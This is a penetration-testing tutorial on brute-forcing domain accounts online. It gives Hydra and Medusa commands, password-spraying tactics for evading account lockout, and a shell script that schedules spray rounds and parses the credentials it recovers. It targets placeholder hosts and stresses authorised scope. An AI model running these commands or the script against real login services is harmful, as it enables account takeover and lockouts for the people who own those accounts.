
Domain Account Brute Force

TL;DR

This guide explains how to brute force domain accounts when you have no password hashes to crack offline and must test credentials online against a live authentication service. It covers Hydra and Medusa, along with techniques for staying under the domain's account lockout policy while keeping a useful success rate.

Understanding the Challenge

Brute-forcing without hashes means submitting username and password guesses to a live login service until one is accepted. Every guess is a network round trip, so it is slow, and every failed guess counts against the account's lockout threshold and is logged on the server. We'll cover ways to make it more effective without locking accounts out.

Step 1: Information Gathering

  1. Identify Target Domain: Know which domain you are attacking (e.g., example.com) and which exposed service authenticates against it. The examples below use an HTTP login form; a web form only tests domain accounts if it authenticates users against the domain (a webmail, VPN or intranet portal, for example), so confirm that first.
  2. Username Enumeration: Find valid usernames. Common methods include:
    • Email Harvesting: Use tools like theHarvester or search engines to find email addresses associated with the domain.
    • Social Media Scraping: Look for employee names on LinkedIn, Twitter, and company websites.
    • Username Format: Organisations almost always use one naming convention (first.last, flast, f.last) across their subdomains and services, so a handful of harvested addresses reveals the pattern and lets you derive usernames for the remaining employee names.

Step 2: Choosing a Brute-Force Tool

Hydra and Medusa are popular choices. Both are multi-threaded, modular online password crackers; they differ mainly in syntax and module coverage, so pick the one whose module fits the target service.

  • Hydra: Versatile, supports many protocols (HTTP forms, FTP, SSH, SMB, RDP, etc.). Simple command line for a username/password list pair; its http-post-form module handles web login forms.
  • Medusa: Modular design with per-host threads (-t) and parallel hosts (-T); its http module handles HTTP authentication and its web-form module handles login forms.

Step 3: Password List Preparation

  1. Common Passwords: Start with a list of the most frequently used passwords (rockyou.txt is a good starting point). Against a domain you will only get a few guesses per account before lockout, so order the list by likelihood rather than running it top to bottom.
  2. Targeted Lists: Create lists based on the company name, seasons and years (Summer2024!, Company123), employee information, or passwords from known data breaches involving the same organisation.
  3. Password Spraying: Use a small number of common passwords against many accounts rather than many passwords against one account. Against domain accounts this is the normal mode of operation: each account receives only one or two guesses per lockout observation window, so the lockout threshold is never reached.

Step 4: Brute-Force Attack with Hydra

Here's an example using Hydra against an HTTP login form. Hydra has to be told which module to use and how the form is submitted; a bare URL is not a valid target. The form path, field names and failure string below are illustrative and must be taken from the real form (inspect the POST request in the browser's developer tools):

hydra -l username -P /path/to/passwordlist.txt -t 1 -W 2 example.com http-post-form "/loginform:username=^USER^&password=^PASS^:F=incorrect"

-l specifies a single username (use -L for a file of usernames), -P specifies the password list, -t 1 runs a single task and -W 2 waits two seconds between connects so the attempt rate stays low. The last argument is the http-post-form module string: the form path, the POST body with ^USER^ and ^PASS^ placeholders, and F= followed by a string that appears in the response to a failed login.

Step 5: Brute-Force Attack with Medusa

Example using Medusa. Note that Medusa's -H takes a file of hosts; a single host is given with -h, and the protocol module is selected with -M:

medusa -h example.com -U /path/to/usernames.txt -P /path/to/passwordlist.txt -M http -m DIR:/loginform -t 4

-h is the target host (-H would be a file with one host per line), -U specifies the username list, -P specifies the password list, -M http selects the HTTP authentication module with -m DIR:/loginform as the path, and -t sets the number of parallel login attempts against that host. The http module performs HTTP authentication (Basic, Digest or NTLM); for a login form use -M web-form instead, and run medusa -M web-form -q to see its FORM and DENY-SIGNAL options. Keep -t low against domain accounts: 40 parallel attempts will burn through a lockout threshold in seconds.

Step 6: Staying Under Account Lockout Policies

  1. Know the Policy: Lockout is defined by three values: the lockout threshold (bad attempts allowed), the observation window (how long bad attempts are counted before the counter resets) and the lockout duration. On a domain-joined host, net accounts /domain prints them; otherwise assume a conservative policy such as 5 attempts per 30 minutes until you learn otherwise.
  2. Slow Down Attack Rate: Reduce the number of attempts per second. In Hydra use -t 1 and -W <seconds> (wait between connects per thread); -d enables debug output and is not a delay. In Medusa reduce -t. Slowing down alone does not prevent lockout, it only spreads attempts out; what matters is the number of bad attempts per account inside the observation window.
  3. Password Spraying: As mentioned earlier, try one password against every account, then wait for the observation window to elapse before the next one, so no account accumulates enough failures to lock.
  4. IP Rotation: Use proxies or VPNs to change your source IP address. This helps against per-source rate limiting and IP blocking on web portals, but does nothing against domain lockout, which the domain controller counts per account regardless of source.
  5. Distributed Attack: The same caveat applies to spreading the attack across multiple machines: it raises throughput and evades source-based blocking, not per-account lockout. Every machine used must be inside the authorised scope.

Step 7: Monitoring and Analysis

  1. Check Output: Hydra prints one line per valid credential (for example [80][http-post-form] host: example.com   login: jsmith   password: ...); Medusa prints ACCOUNT FOUND: [module] Host: ... User: ... Password: ... [SUCCESS]. Write the results to a file (Hydra -o, Medusa -O) so you keep a timestamped record.
  2. Error Messages: Watch for responses that change mid-run. If a web form starts returning an "account locked" page, a redirect or a CAPTCHA, lockout or rate limiting has kicked in; because the tools judge success by the absence of the failure string you gave them, such responses can also be reported as false positives, so verify every reported hit by hand.
  3. Adjust Strategy: If accounts lock out, stop, tell the client so they can unlock them, and lengthen the wait between spray rounds or switch to a more targeted password list.
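As an added example, not code from the original article, here is a small POSIX shell wrapper that ties Steps 3 to 7 together: it spaces Hydra spray rounds so that no account receives more than the lockout threshold minus a safety margin of bad attempts per observation window, and it parses the success lines Hydra and Medusa print. The target host, form string, user list path, lockout values and the sample passwords are assumed placeholders; take the real lockout values from the domain policy before running it.

```shell
#!/bin/sh
# Added example (not from the original article): lockout-aware password
# spraying wrapper around Hydra, plus parsers for Hydra/Medusa success lines.
# TARGET, USERS, FORM, the lockout values and the demo passwords below are
# assumed placeholders, not real data.

TARGET="example.com"
USERS="/path/to/usernames.txt"
FORM="/loginform:username=^USER^&password=^PASS^:F=incorrect"
LOCKOUT_THRESHOLD=5        # bad attempts before the account locks (assumed policy)
OBSERVATION_WINDOW=1800    # seconds until the bad-attempt counter resets (assumed)
SAFETY_MARGIN=2            # stay this many attempts below the threshold
DRY_RUN=${DRY_RUN:-1}      # 1 = print the hydra commands instead of running them

# Passwords we may try per account inside one observation window (at least 1).
attempts_per_window() {
  n=$(( LOCKOUT_THRESHOLD - SAFETY_MARGIN ))
  [ "$n" -ge 1 ] || n=1
  echo "$n"
}

# Hydra command for one spray round: one password against every user, a single
# task (-t 1), a pause between connects (-W 2) and results appended to a file.
hydra_cmd() {
  printf "hydra -L %s -p '%s' -t 1 -W 2 -o hydra.log %s http-post-form '%s'\n" \
    "$USERS" "$1" "$TARGET" "$FORM"
}

# Read passwords from stdin, one per line, and emit (or run) one round each.
# After every attempts_per_window rounds, wait a full observation window so
# each account's bad-password counter has reset before it sees more guesses.
plan_spray() {
  per_window=$(attempts_per_window)
  i=0
  while IFS= read -r pw; do
    [ -n "$pw" ] || continue
    if [ "$i" -gt 0 ] && [ $(( i % per_window )) -eq 0 ]; then
      echo "# sleep ${OBSERVATION_WINDOW}s: observation window must elapse before the next batch"
      [ "$DRY_RUN" -eq 1 ] || sleep "$OBSERVATION_WINDOW"
    fi
    if [ "$DRY_RUN" -eq 1 ]; then
      hydra_cmd "$pw"
    else
      sh -c "$(hydra_cmd "$pw")"
    fi
    i=$(( i + 1 ))
  done
}

# Turn a Hydra success line such as
#   [80][http-post-form] host: example.com   login: jsmith   password: Winter2024!
# into "host login password" on one line.
parse_hydra_hits() {
  sed -n 's/^\[[0-9]*\]\[[^]]*\] host: \([^ ]*\) *login: \([^ ]*\) *password: \(.*\)$/\1 \2 \3/p'
}

# Same for a Medusa success line such as
#   ACCOUNT FOUND: [http] Host: example.com User: jsmith Password: Winter2024! [SUCCESS]
parse_medusa_hits() {
  sed -n 's/^ACCOUNT FOUND: \[[^]]*\] Host: \([^ ]*\) User: \([^ ]*\) Password: \(.*\) \[SUCCESS\]$/\1 \2 \3/p'
}

# Constructed demo input (dry run): four candidate passwords, threshold 5,
# margin 2 -> three rounds, a wait for the window, then the fourth round.
printf 'Winter2024!\nSummer2024!\nCompany123\nPassword1\n' | plan_spray
```

Run it with DRY_RUN=0 only inside an authorised scope; the dry run is there so you can check the schedule against the client's lockout policy first. Pipe saved tool output through parse_hydra_hits or parse_medusa_hits to pull the credentials out of a long log.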

Important Considerations

  • Legality: Brute-forcing without permission is illegal in most jurisdictions. Only perform these actions on systems you own or have explicit authorization to test.
  • Ethical Hacking: If performing a penetration test, ensure you have a clear scope and written consent from the system owner.
  • Record Keeping: Keep a timestamped log of every attempt and every credential found, so the client can correlate your activity with their authentication logs and any lockouts, and treat recovered passwords as sensitive data for the rest of the engagement.